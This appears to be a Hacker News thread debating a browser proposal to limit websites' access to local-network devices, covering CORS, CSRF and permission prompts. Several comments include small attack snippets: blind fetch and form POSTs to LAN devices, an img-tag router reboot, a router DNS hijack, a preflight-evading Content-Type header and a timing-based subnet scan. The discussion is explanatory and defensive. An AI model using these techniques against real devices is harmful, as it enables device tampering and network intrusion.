I like this at first glance. The idea of a random website probing arbitrary local IPs (or any IPs, for that matter) with HTTP requests is insane. I wouldn't care if it breaks some enterprise apps or integrations - enterprises could re-enable this "feature" via management tools, and normal users could configure it themselves; just show a popup "this website wants to control local devices - allow/deny".
This is a misunderstanding. Local network devices are protected from random websites by CORS, and have been for many years. It's not perfect, but it's generally quite effective.
The issue is that CORS gates access only on the consent of the target server. It must return headers that opt into receiving requests from the website.
This proposal aims to tighten that, so that even if the website and the network device both actively want to communicate, the user's permission is also explicitly requested. Historically we assumed server & website agreement was sufficient, but Facebook's recent tricks where websites secretly talked to apps on your phone have broken that assumption - websites might be in cahoots with local network servers to work against your interests.
Doesn't CORS just restrict whether the webpage JS context gets to see the response of the target request? The request itself happens anyway, right?
So the attack vector I can imagine is that JS in the browser issues a specially crafted request to a vulnerable printer (or whatever) that triggers arbitrary code execution on that device. That code might be sufficient to make the printer carry out your evil task, including making an outbound connection to the attacker's server. Of course, the webpage would not be able to discover whether it was successful, but that may not be important.
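To make that concrete, here's a minimal sketch (the device address and endpoint are invented; any "simple" request behaves the same way):

    // The request below is delivered to the device even though the promise
    // rejects: without CORS headers on the response, the browser only
    // refuses to let the page *read* it.
    try {
      await fetch("http://192.168.1.50/admin/update", {
        method: "POST",
        body: "payload=...", // defaults to text/plain, a "simple" type, so no preflight
      });
    } catch (err) {
      // TypeError here -- but the device has already processed the request.
    }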
I think CORS is so hard for us to hold in our heads in large part due to how much is stuffed into the algorithm.
It may send an OPTIONS request, or not.
It may block a request being sent (in response to OPTIONS) or block a response from being read.
It may restrict which headers can be set, or read.
It may downgrade the request you were sending silently, or consider your request valid but the response off limits.
It is essentially a matrix of independent gates.
Even the language we use is imprecise: CORS itself is not really doing any of this blocking. As others pointed out, it's the Same-Origin Policy that is the strict one; CORS is really an exception engine that lets us punch through that security layer.
No, a preflight (OPTIONS) request is sent by the browser before the request initiated by the application. I would be surprised if the client browser can control this OPTIONS request beyond the URL. I'm curious if anyone else has input on this topic, though.
Maybe there is some side-channel timing that can be used to determine the existence of a device, but not so sure about actually crafting and delivering a malicious payload.
This tag:
<img src="http://192.168.1.1/router?reboot=1">
triggers a local network GET request without any CORS involvement. I remember back in the day you could embed <img src="http://someothersite.com/forum/ucp.php?mode=logout"> in your forum signature and screw with everyone's sessions across the web.
Haha I remember that. The solution at the time for many forum admins was to simply state that anyone found to be doing that would be permabanned. Which was enough to make it stop completely, at least for the forums that I moderated. Different times indeed.
<img src="C:\con\con"></img>
It's essentially the same, as many apps use an HTTP server + HTML client instead of something native or another IPC mechanism.
Exactly. You can also trigger forms for POST or DELETE etc.; this is called CSRF if the endpoint doesn't validate some token in the request. CORS only protects against unauthorized XHR requests. All decades-old OWASP basics, really.
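For concreteness, a sketch of the form-based variant (router address and field names invented):

    // Build and auto-submit a hidden form. This is plain navigation-style
    // form submission, so neither CORS nor preflights are involved.
    const form = document.createElement("form");
    form.method = "POST";
    form.action = "http://192.168.1.1/apply"; // hypothetical device endpoint
    const field = document.createElement("input");
    field.type = "hidden";
    field.name = "dns";
    field.value = "203.0.113.7"; // attacker-controlled resolver
    form.appendChild(field);
    document.body.appendChild(form);
    form.submit(); // the browser sends the cross-origin POST, cookies and all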
That highly ranked comments on HN (an audience with far above-average interest in software and security) get this wrong kinda explains why these things keep being an issue.
I'm betting HN is vastly more normal people and manager types than people want to admit.
None of us had to pass a security test to post here. There's no filter. That makes it pretty likely that HN's community is exactly as shitty as the rest of the internet's.
People need to stop treating this community like some club of enlightened elites. It's hilariously sad and self-congratulatory.
I don't know why you are getting downvoted; you do have a point. Some of the comments show people know what CORS headers are, but apparently not their purpose or how they relate to CSRF, which is worrying. It's not meant as disparaging. My university thankfully taught a course on OWASP; otherwise I'd probably be oblivious too.
If you're going cross-domain with XHR, I'd hope you're mostly sending json request bodies and not forms.
Though to be fair, a lot of web frameworks have methods to bind named inputs that allow either.
This misses the point a bit. CSRF usually applies to people who want only same-domain requests and don't realize that cross-domain is an option for the attacker.
On the modern web it's much less of an issue, since SameSite cookies are the default.
> Exactly. You can also trigger forms for POST or DELETE etc.
You can't do a DELETE from a form; you have to use AJAX. And a cross-origin DELETE needs a preflight.
To nitpick, CSRF is not the ability to use forms per se, but relying solely on the existence of a cookie to authorize actions with side effects.
The expectation is that this should not work: well-behaved network devices shouldn't accept a blind GET like this for destructive operations. There are plenty of other good reasons for that. And there's no real alternative unless you're also going to block page redirects and links to these URLs, which trigger a similar GET; that would make it impossible to reach any local network page without typing the address manually.
While it clearly isn't a hard guarantee, in practice it does seem to generally work, as these have been known issues for decades without apparent massive exploits. That CORS restrictions block probing (no response provided) does help make this all significantly more difficult.
"No true Scotsman allows GETs with side effects" is not a strong argument
It's not just HTTP where this is a problem. There are enough http-ish protocols where protocol smuggling confusion is a risk. It's possible to send chimeric HTTP requests at devices which then interpret them as a protocol other than http.
Yes, which is why web browsers, way back even in the Netscape Navigator era, had a blacklist of disallowed ports.
The idea is, the malicious actor would use a 'simple request' that doesn't need a preflight (basically, a GET or POST request with form data or plain text), and manage to construct a payload that exploits the target device. But I have yet to see a realistic example of such a payload (the paper I read about the idea only vaguely pointed at the existence of polyglot payloads).
There doesn't need to be any kind of "polyglot payload". Local network services and devices that accept only simple HTTP requests are extremely common. The request will go through and alter state, etc.; you just won't be able to read the response from the browser.
Exactly. The people answering must not be aware that "simple" requests don't require a preflight.
I can give an example of this; I found such a vulnerability a few years ago now in an application I use regularly.
The target application in this case was trying to validate incoming POST requests by checking that the incoming MIME type was "application/json". Normally, you can't make unauthorized XHR requests with this MIME type as CORS will send a preflight.
However, because of the way it was checking for this (checking whether the Content-Type header contained the text "application/json"), it was relatively easy to construct a Content-Type header that avoided the preflight:
Content-Type: multipart/form-data; boundary=application/json
It's worth bearing in mind in this case that the payload doesn't actually have to be form data - the application was expecting JSON, after all! As long as the web server doesn't do its own data validation (which it didn't in this case), we can just pass JSON as normal.
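Roughly, the request looked like this (endpoint and payload invented; the real details don't matter):

    // The header's *essence* is multipart/form-data, which is CORS-safelisted,
    // so the browser sends this POST without a preflight. The server's naive
    // substring check then finds "application/json" and accepts the body.
    await fetch("http://192.168.1.20/api/endpoint", {
      method: "POST",
      headers: {
        "Content-Type": "multipart/form-data; boundary=application/json",
      },
      body: JSON.stringify({ action: "..." }),
    });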
This was particularly bad because the application allowed arbitrary code execution via this endpoint! It was fixed, but in my opinion, something like that should never have been exposed to the network in the first place.
Oh, you can only send arbitrary text or form submissions. That’s SO MUCH.
You don't even need to be exploiting the target device, you might just be leaking data over that connection.
Yeah, I think this is the reason this proposal is getting more traction again.
Here's a formal definition of such simple requests, which may be more expansive than one might expect: https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/COR...
Some devices don't bother to limit the size of the GET, which can enable a DoS attack at least, a buffer overflow at worst. But I think the most typical vector is a form-data POST, which isn't CSRF-protected because "it's on localhost so it's safe, right?"
I've been that sloppy with dev servers too. Usually not listening on port 80 but that's hardly Ft Knox.
I think that is because it is so old that it's basically old news and mostly mitigated.
https://www.kb.cert.org/vuls/id/476267 is an article from 2001 on it.
It can send a json-rpc request to your bitcoin node and empty your wallet
Do you know of any such node that doesn't check the Content-Type of requests and also has no authentication?
Bitcoin Core if you disable authentication
There's no such thing, short of forking it yourself. You can set the username and password to admin:admin if you want, but Bitcoin Core's JSON-RPC server requires an Authorization header on every request [0], and you can't put an Authorization header on a cross-origin request without a preflight.
[0] https://github.com/bitcoin/bitcoin/blob/v29.0/src/httprpc.cp...
Good to know. I remember you used to be able to disable it via config, but it looks like I was wrong.
You’re forgetting { mode: 'no-cors' }, which makes the response opaque (no way to read the data) but completely bypasses the CORS preflight request and header checks.
This is missing important context. You are correct that the preflight will be skipped, but there are further restrictions when operating in this mode. They don't guarantee your server is safe, but they do force operation under a "safer" subset of verbs and header fields (a short sketch follows the list below).
The browser will restrict the headers and methods of requests that can be sent in no-cors mode. (silent censoring in the case of headers, more specifically)
Anything besides GET, HEAD, or POST will result in an error in the browser and not be sent.
All headers besides the CORS-safelisted ones [0] will be dropped.
And Content-Type must be one of application/x-www-form-urlencoded, multipart/form-data, or text/plain. Attempting to use anything else will see the header replaced by text/plain.
[0] https://developer.mozilla.org/en-US/docs/Glossary/CORS-safel...
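A quick sketch of what that looks like in practice (the address is made up):

    // The response comes back "opaque": type is "opaque", status reads as 0,
    // and the body is unreadable. The request itself still reached the server.
    const res = await fetch("http://192.168.0.10/update", {
      mode: "no-cors",
      method: "POST",
      headers: { "Content-Type": "text/plain" }, // only the form types survive
      body: '{"looks":"like json, sent as text/plain"}',
    });
    console.log(res.type, res.status); // "opaque" 0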
That’s just not that big of a restriction. Anecdotally, very few JSON APIs I’ve worked with have bothered to check the request Content-Type. (“Minimal” web frameworks without built-in security middleware have been very harmful in this respect.) People don’t know about this attack vector and don’t design their backends to prevent it.
I agree that it is not a robust safety net. But in the instance you're citing, that's a misconfigured server.
What framework allows you to set up a misconfigured parser out of the box?
I don't mean that as a challenge, but as a server framework maintainer I'm genuinely curious. In Express we would definitely allow people to opt into this, but you have to explicitly make the choice to configure body-parser.json to accept all content types via a noop function for type checking.
Meaning, it's hard to get into this state!
Edit to add: there are myriad ways to misconfigure a webserver to make it insecure without realizing it. But IMO that is the point of using a server framework! To make it less likely devs will footgun, via sane defaults that prevent these scenarios unless someone really wants to make a different choice.
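To illustrate the difference (a hedged sketch; route and port are invented):

    import express from "express";

    const app = express();

    // Default: express.json() only parses bodies whose Content-Type is
    // application/json -- exactly the type a cross-origin page can't send
    // without triggering a preflight.
    app.use(express.json());

    // The footgun you'd have to opt into: a noop type check that accepts
    // any Content-Type, including the "simple" ones an attacker can send.
    // app.use(express.json({ type: () => true }));

    app.post("/api/settings", (req, res) => {
      res.json({ received: req.body }); // undefined when no parser matched
    });

    app.listen(3000);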
SvelteKit for sure, and any other JS framework that uses the built-in Request class (which doesn’t check the Content-Type when you call json()).
I don’t know the exact frameworks, but I consume a lot of random undocumented backend APIs (web scraper work) and 95% of the time they’re fine with JSON requests with Content-Type: text/plain.
I think you’re making those restrictions out to be bigger than they are.
Does no-cors allow a nefarious company to send a POST request to a local server, running in an app, containing whatever arbitrary data they’d like? Yes, it does. When you control the server side the inability to set custom headers etc doesn’t really matter.
My intent isn't to convince people this is a safe mode, but to share knowledge in the hope someone learns something new today.
I didn't mean it to come across that way. The spec does what the spec does; we should all be aware of it so we can make informed decisions.
Thankfully no-cors also restricts most headers, including setting Content-Type to anything but the built-in form types. So while CSRF doesn't even need a click because of no-cors, it's still not possible to do CSRF against a JSON-only API. Just be sure the server is actually set up to restrict the content type - most frameworks will "helpfully" accept and convert form-data by default.
> No, a preflight (OPTIONS) request is sent by the browser first prior to sending the request initiated by the application.
Note: preflight is not required for any type of request that browser js was capable of making prior to CORS being introduced. (Except for local network)
So a simple GET or POST does not require OPTIONS, but if you set a header it might require OPTIONS (unless it's a header you could set in the pre-CORS world).
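Concretely (addresses invented):

    // Goes straight out: a GET with no custom headers was possible pre-CORS.
    await fetch("http://192.168.1.20/status");

    // Triggers an OPTIONS preflight first: X-Custom wasn't settable pre-CORS,
    // and the real request is only sent if the server opts in.
    await fetch("http://192.168.1.20/status", {
      headers: { "X-Custom": "1" },
    });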
It depends. GET requests are assumed not to have side effects, so they often don't trigger a preflight request (although there are cases where they do). But of course, not all sites follow those semantics, and it wouldn't surprise me if printer or router firmware used GETs to do something dangerous.
Also, form submission famously doesn't require CORS.
There is a limited, but potentially effective, attack surface via URL parameters.
I can confirm that local websites that don't implement CORS via the OPTIONS request cannot be browsed with mainstream browsers. Does nothing to prevent non-browser applications running on the local network from accessing your website.
As far as I can tell, the only thing this proposal does that CORS does not already do is provide some level of enterprise configuration control to guard against the scenario where your users are using compromised internet sites that can ping around your internal network for agents running on compromised desktops. Maybe? I don't get it.
If somebody would fix the "no HTTPS for local connections" issue, then IoT websites could use authenticated logins to fix both problems. Non-HTTPS websites also have no access to browser crypto APIs, so roll-your-own auth (the horror) isn't an option either. Frustrating!
I don't believe this is true? As others have pointed out, preflight OPTIONS requests only happen for non-simple requests. CORS response headers are still required to read a cross-domain response, but that still leaves a huge window for a malicious site to send side-effectful requests to local network devices running badly implemented web servers.
[edit]: I was wrong. Just tested that a moment ago. It turns out NOT to be true. My web server during normal operation is currently NOT getting OPTIONS requests at all.
Wondering whether I triggered CORS requests when I was struggling with IPv6 problems. Or maybe it triggers when I redirect index.html requests from IPv6 to IPv4 addresses. Or maybe I got caught by the earlier rollout of version one of this proposal? There was definitely a time while I was developing pipedal when none of my images displayed because my web server wasn't doing CORS. But whatever my excuse might be, I was wrong. :-/
Or simply perform a timing attack as a way of exploring the local network - though I'm not sure whether the browser implementation returns immediately after the request is made (e.g. when the fetch API is called) but before the response is received. Presumably it doesn't, which would expose it to timing attacks as a way of exploring the network.
eBay, for one, has been (was?) fingerprinting users like this for years.
https://security.stackexchange.com/questions/232345/ebay-web...
Almost every JS API for making requests is asynchronous, so they do return after the request is made. The exception is synchronous XHR calls, but I'm not sure if those are still supported.
... Anyhow, I think it doesn't matter, because you can listen for the error/failure of most async requests. CORS errors are equivalent to network errors - the browser tells the JS it got status code 0 with no further information - but the timing of that could allow some sort of inference? Hard to say what that would be, though. Maybe if you knew the target webserver was slow but would respond to certain requests, a slower failed local request could mean it actually reached a target device.
That said, why not just fire off simple http requests with your intended payload? Abusing the csrf vulnerabilities of local network devices seems far easier than trying to make something out of a timing attack here.
This is also a misunderstanding. CORS only applies to Layer 7 communication. The rest you can figure out from its timing.
Significant components of the browser, such as WebSockets, have no such restrictions at all.
Won't the browser still append the "Origin" field to WebSocket requests, allowing servers to reject them?
yes, and that's exactly how discord's websocket communication checks work (allowing them to offer a non-scheme "open in app" from the website).
they also had some kind of RPC websocket system for game developers, but that appears to have been abandoned: https://discord.com/developers/docs/topics/rpc
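For reference, the server side of that check is just a header comparison on the opening handshake. A hedged sketch using Node's "ws" package (the allowed origin is invented):

    import { WebSocketServer } from "ws";

    const wss = new WebSocketServer({ port: 8080 });

    wss.on("connection", (socket, req) => {
      // Browsers always attach the page's Origin to the opening handshake.
      // Non-browser clients can forge it, so this only fences off web pages.
      if (req.headers.origin !== "https://app.example.com") {
        socket.close(1008, "origin not allowed"); // 1008 = policy violation
        return;
      }
      // ...proceed with the trusted connection...
    });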
A WebSocket starts as a normal HTTP request, so it is subject to CORS if that initial request is (e.g. if it is a POST).
CORS doesn’t protect you from anything. Quite the opposite: it _allows_ cross origin communication (provided you follow the spec). The same origin policy is what protects you.
I made a CTF challenge 3 years ago that shows why local devices are not so protected. exploitv99 bypasses PNA with timing, as the other commenter points out.
https://github.com/adc/ctf-midnightsun2022quals-writeups/tre...
CORS prevents the site from accessing the response body. In some scenarios a website could, for example, blindly attempt to authenticate to your router and modify settings by guessing your router brand/model and password.
> The issue is that CORS gates access only on the consent of the target server. It must return headers that opt into receiving requests from the website.
False. CORS only gates non-simple requests (via OPTIONS); simple requests are sent regardless of CORS config - there is no gating whatsoever.
How would Facebook do that? They scan all likely local ranges for what could be your phone, and have a web server running on the phone? That seems more like a problem of allowing the phone app to start something like that and keep it running in the background.
WebRTC allows you to find the local ranges.
Typically there are only 256 IPs, so a scan of them all is almost instant.
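A hedged sketch of such a scan (the /24 guess and the timing threshold are illustrative, and modern browsers add noise):

    // Probe each address with an opaque request and compare elapsed time.
    // A fast settle (resolve or reject) hints that something is there;
    // a timeout suggests nothing is. Crude, but often enough for discovery.
    async function probe(ip: string): Promise<number> {
      const start = performance.now();
      try {
        await fetch(`http://${ip}/`, {
          mode: "no-cors",
          signal: AbortSignal.timeout(1000),
        });
      } catch {
        // Rejection carries no detail; only the timing differs.
      }
      return performance.now() - start;
    }

    for (let i = 1; i < 255; i++) {
      const ip = `192.168.1.${i}`;
      if ((await probe(ip)) < 100) console.log(ip, "may be alive");
    }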
Do you have a link talking about those Facebook's recent tricks? I think I missed that story, and would love to read an analysis about it
I think this can be circumvented by DNS rebinding, though your requests won't have the authentication cookies for the target, so you would still need some kind of exploit (or a completely unprotected target).
How? The browser would still have to resolve it to a final IP right?
I'm not sure what you mean but this explains it: https://github.blog/security/application-security/localhost-...
Is this kind of attack actually in scope for this proposal? The explainer doesn't mention it.
> Local network devices are protected from random websites by CORS
C'mon. We all know that 99% of the time, Access-Control-Allow-Origin is set to * and not to the specific IP of the web service.
Also, CORS is not in the control of the user while the proposal is. And that's a huge difference.
> but Facebook's recent tricks where websites secretly talked to apps on your phone have broken that assumption - websites might be in cahoots with local network servers to work against your interests.
This isn't going to help for that. The locally installed app, and the website, can both, independently, open a connection to a 3rd party. There's probably enough fingerprinting available for the 3rd party to be able to match them.
This sounds crazy to me. Why should websites ever have access to the local network? That presents an entirely new threat model for which we don’t have a solution. Is there even a use case for this for which there isn’t already a better solution?
I've used https://pairdrop.net/ before to share files between devices on the same LAN. It obviously wouldn't have to be a website, but it's pretty convenient since all my devices I wanted to share files on already have a browser.
Same use case, but I remember getting approval prompts (though come to think of it, those were not mandated but application-specific prompts, to ensure you consciously chose to share/receive items). To your point, there are valid use cases for it, but some tightening would likely be beneficial.
Not a local network, but localhost example: due to the lousy private certificate capability APIs in web browsers, this is commonly used for signing with electronic IDs for countries issuing smartcard certificates for their citizens (common in Europe). Basically, a web page would contact a web server hosted on localhost which was integrated with PKCS library locally, providing a signing and encryption API.
One of the solutions in the market was open source up to a point (Nowina NexU), but it seems it's gone from GitHub
For local network, you can imagine similar use cases — keep something inside the local network (eg. an API to an input device; imagine it being a scanner), but enable server-side function (eg. OCR) from their web page. With ZeroConf and DHCP domain name extensions, it can be a pretty seamless option for developers to consider.
>Why should websites ever have access to the local network?
It's just the default. So far, browsers haven't really given different IP ranges different security.
evil.com is allowed to make requests to bank.com. Similarly, evil.com is allowed to make requests to foo.com even if foo.com DNS resolves to 127.0.0.1.
> It's just the default. So far, browsers haven't really given different IP ranges different security.
I remember having "zone" settings in Internet Explorer 20 years ago, and ISTR it did IP ranges as well as domains. Don't think it did anything about cross-zone security though.
> Is there even a use case for this for which there isn’t already a better solution?
I deal with a third-party hosted webapp that enables extra functionality when a webserver hosted on localhost is present. The local webserver exposes an API allowing the application to interact more closely with the host OS (think locally-attached devices and servers on the local network). If the locally-installed webserver isn't present, the hosted app hides the extra functionality.
Limiting browser access to the localhost subnet (127.0.0.0/8) would be fine with me, as a sysadmin, so long as I have the option to enable it for applications where it's desired.
>That presents an entirely new threat model for which we don’t have a solution.
What attack do you think doesn't have a solution? CSRF attacks? The solution is CSRF tokens, or checking the Origin header, same as how non-local-network sites protect against CSRF. DNS rebinding attacks? The solution is checking the Host header.
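A minimal sketch of both checks (Express-style; the hostnames and addresses are invented):

    import express from "express";

    const app = express();
    const ALLOWED_HOSTS = new Set(["device.local", "192.168.1.10"]);
    const ALLOWED_ORIGINS = new Set(["http://device.local"]);

    app.use((req, res, next) => {
      // Host check: defeats DNS rebinding, where an attacker's hostname
      // resolves to this device but the Host header betrays the trick.
      if (!ALLOWED_HOSTS.has(req.headers.host ?? "")) {
        return res.status(403).send("unexpected Host header");
      }
      // Origin check: browsers attach Origin to cross-origin requests,
      // so state-changing requests from foreign pages can be refused.
      const origin = req.headers.origin;
      if (req.method !== "GET" && origin && !ALLOWED_ORIGINS.has(origin)) {
        return res.status(403).send("cross-origin request refused");
      }
      next();
    });

    app.listen(80);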
>for which we don’t have a solution
It's called ZTA, Zero Trust Architecture. Devices shouldn't assume the LAN is secure.
> normal users could configure it themselves, just show a popup "this website wants to control local devices - allow/deny".
macOS currently does this (per app, not per site), and most users just click yes without a second thought. Doing it per site might create a little more apprehension, but I imagine not much.
Do we have any evidence that most users just click yes?
My parents, who are non-technical, click no by default on everything. Sometimes they ask for my assistance when something doesn't work, and often it's because they denied some permission that is essential for an app to work - e.g. they denied microphone access to an audio-call app.
Unless we have statistics, I don't think we can make assumptions.
The amount of "malware" infections I've responded to over the years that involved browser push notifications to Windows desktops is completely absurd. Chrome and Edge clearly ask for permissions to enable a browser push.
The moment a user gets this permissions request, as far as I can tell they will hit approve 100% of the time. We have one office where the staff have complained that it's impossible to look at astrology websites without committing to desktop popups selling McAfee - implying that those staff, despite having been trained to hit "no", believe the popups are unavoidable.
(yes, we can disable with a GPO, which I heavily promote, but that org has political problems).
As a counter example, I think all these dialogs are annoying as hell and click yes to almost everything. If I’m installing the app I have pre-vetted it to ensure it’s marginally trustworthy.
I have no statistics, but I wouldn't consider older parents the typical case here. My parents never click yes on anything, but my young colleagues in non-engineering roles in my office do. And I'd say even a decent share of the engineering colleagues do too - especially the vibe coders. And they all spend a lot more time on their computers than my parents do.
Interesting parallel between the older parents who (may have finally learned to) deny, and young folks - supposed digital natives, a majority of whom don't really understand how computers work.
People accept permission prompts from apps because they consciously downloaded the app and generally have an idea about the developer and what the app does. If a social media app asks for permission to access your photos it's easy to understand why, same with a music streamer wanting to connect to your smart speaker.
A random website someone linked me to wanting to access my local network is a very different case. I'm absolutely not giving network or location or camera or any other sort of access to websites except in very extreme circumstances.
"Please accept the [tech word salad] popup to verify your identity"
Maybe this won't fool you, but it would trick 90% of internet users. (And even if it was 20% instead of 90%, that's still way too much.)
I have seen it posed as 'This site has bot protection. Confirm that you are not a bot by clicking yes', trying to mimic the modern Cloudflare / Google captchas.
To be clear: implementing this in browser on a per site basis would be a massive improvement over in-OS/per-app granularity. I want this popup in my browser.
But I was just pointing out that, while I'll make good use of it, it still probably won't offer sufficient protection (from themselves) for most.
I can't believe that anyone still thinks a popup permission modal offers any type of security. Windows UAC has shown quite definitively that users will always click through any modal in their way without thought or comprehension.
Besides that, approximately zero laypersons will have even the slightest clue what this permission means, the risks involved, or why they might want to prevent it. All they know is that the website they want is not working, and the website tells them to enable this or that permission. They will all blindly enable it every single time.
I wonder how much of that is on the modal itself. Imagine we instead popped up an alert that said "Blocked an attempt to talk to your local devices, since this is generally a dangerous thing for websites to do. <dismiss>. To change this for this site, go to settings/site-security" - making approval a more deliberate, multi-click affair and defaulting the knee-jerk single-click dismissal to the safer option of refusal.
I don't think anyone's under the impression that this is a perfect solution. But it's better than nothing, and the options are this, nothing, or a security barrier that can't be bypassed with a permission prompt. And it was determined that the latter would break too many existing sites that have legitimate (i.e., doing something the end user actively wants) reason to talk to local devices.
I think it does, in many (but definitely not all) contexts.
For example, it's pretty straightforward what camera, push notification, or location access means. Contact sharing is already a stretch ("to connect you with your friends, please grant...").
"Local network access"? Probably not.
Maybe. But eventually they will learn. In the meantime, other users, who at least try to stay somewhat safe (if it is even possible these days), can make appropriate adjustments.
This is so true. The modern Mac is a sea of Allow/Don't Allow prompts, mixed with the slightly more infantilizing alternative of the "Block" / "Open System Preferences" where you have to prove you know what you're doing by manually browsing for the app to grant the permission to, to add it to the list of ones with whatever permission.
They're just two different approaches with the same flaw: People with no clue how tech works cannot completely protect themselves from any possible attacker, while also having sophisticated networked features. Nobody has provided a decent alternative other than some kind of fully bubble-wrapped limited account using Group Policies, to ban all those perms from even being asked for.
> The modern Mac is a sea of Allow/Don't Allow prompts
Remember when they used to mock this as part of their marketing?
Windows Vista would spawn a permissions prompt when users did something as innocuous as creating a shortcut on their desktop.
Microsoft deserved to be mocked for that implementation.
macOS shows a permission dialog when I plug my AirPods in to charge. I have no idea what I'm even giving permission for, but it pops up every time.
Asking you if you trust a device before opening a data connection to it is simply not the same thing as asking the person who just created a shortcut if they should be allowed to do that.
How do you know the person created the shortcut and not some malware trying to get a user to click on an executable and elevate permissions?
I once encountered malware on my roommate’s Windows 98 system. It was a worm designed to rewrite every image file as a VBS script that would replicate and re-infect every possible file whenever it was clicked or executed. It hid the VBS extensions and masqueraded as the original images.
Creation of a shortcut on Windows is not necessarily innocuous. It was a common first vector to drop malware as users were accustomed to installing software that did the same thing. A Windows shortcut can hide an arbitrary pathname, arbitrary command-line arguments, a custom icon, and more; these can be modified at any time.
So whether it was a mistake for UAC to be overzealous or obstructionist, or Microsoft was already being mocked for poor security, perhaps they weren’t wrong to raise awareness about such maneuvers.
A user creating a shortcut manually is not something that requires a permissions prompt.
If you want to teach users to ignore security prompts, then completely pointless nagging is how you do it.
Programs running during the user session are often running as that user.
The "correct answer" to this is probably that there isn't a good answer here.
Security is a damn minefield and it's getting worse every day.
There is no universe in which it makes sense to ask the very user who just created a shortcut if they should have permission to create that shortcut.
This is why Microsoft was so widely mocked for just how bad their initial implementation of UAC was.
"iPhone Shortcuts always asks permission to access file"
https://discussions.apple.com/thread/254931245
iOS Shortcut danger
https://cyberpress.org/unveiling-risks-of-ios-shortcuts/
But anywho, cve.org lists 78 shortcut vulnerabilities across many platforms.
I know you'd like to believe the world we live in shouldn't require permissions for a user to create a shortcut and then access it, but that... Is actually the world we live in, and have been in for a very long time.
Security is hard and it's not getting any easier as system complexity increases.
If you don't believe me, ask your favorite LLM. I asked Gemini and got back what I expected to.
And annoyingly, for some reason it does not remember this decision properly. Chrome asks me about local access every few weeks, it seems.
Yes, as a Chromecast user, please do give me a break from the prompts, macOS – or maybe just show them for Airplay with equal frequency and see how your users like that.
Problem is: without allowing it, web UIs like Synology's won't work, since they require your browser to connect to the local network... as it is, it's not great.
This proposal is for websites outside your network contacting inside your network. I assume local IPs will still work.
Why? I’d guess requests from a local network site to itself (maybe even to others on the same network) will be allowed.
This Web Security lecture by Feross Aboukhadijeh has a great example of Zoom's zero-day from 2019 that allowed anyone to force you to join a zoom meeting (and even cause arbitrary code execution), using a local server:
https://www.youtube.com/watch?v=wLgcb4jZwGM&list=PL1y1iaEtjS...
It's not clear to me from Google's proposal if it also restricts access to localhost, or just your local network - it'd be great if it were both, as we clearly can't rely on third parties to lock down their local servers sufficiently!
edit: localhost won't be restricted:
"Note that local -> local is not a local network request, as well as loopback -> anything. (See "cross-origin requests" below for a discussion on potentially expanding this definition in the future.)"
>edit: localhost won't be restricted:
It will be restricted. This proposal isn't completely blocking all localhost and local IPs. Rather, it's preventing public sites from communicating with localhost and local IPs. E.g:
* If evil.com makes a request to a local address it'll get blocked.
* If evil.com makes a request to a localhost address it'll get blocked.
* If a local address makes a request to a localhost address it'll get blocked.
* If a local address makes a request to a local address, it'll be allowed.
* If a local address makes a request to evil.com it'll be allowed.
* If localhost makes a request to a localhost address it'll be allowed.
* If localhost makes a request to a local address, it'll be allowed.
* If localhost makes a request to evil.com it'll be allowed.
Ahh, thanks for clarifying! It's the origin being compared, not the context - of course.